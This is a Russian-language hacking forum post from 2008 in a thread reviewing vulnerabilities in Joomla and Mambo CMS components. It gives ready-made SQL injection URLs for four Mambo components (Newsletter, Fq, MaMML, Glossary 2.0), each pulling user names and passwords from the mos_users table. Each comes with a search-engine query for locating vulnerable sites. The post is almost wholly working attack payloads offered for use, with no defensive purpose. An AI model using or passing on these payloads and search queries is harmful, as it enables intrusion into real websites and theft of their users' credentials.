Тема: Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов
Показать сообщение отдельно

  #7  
Старый 30.01.2008, 18:57
Solide Snake
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


По умолчанию
Mambo Component Newsletter (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_newsletter"

Mambo Component Fq (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_fq"

Mambo Component MaMML (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_mamml"

Mambo Component Glossary 2.0 (catid) SQL Injection

SQL Injection:

Код:
index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users-
Для поиска вводим:

Код:
allinurl: "com_glossary"
(c)
 
Ответить с цитированием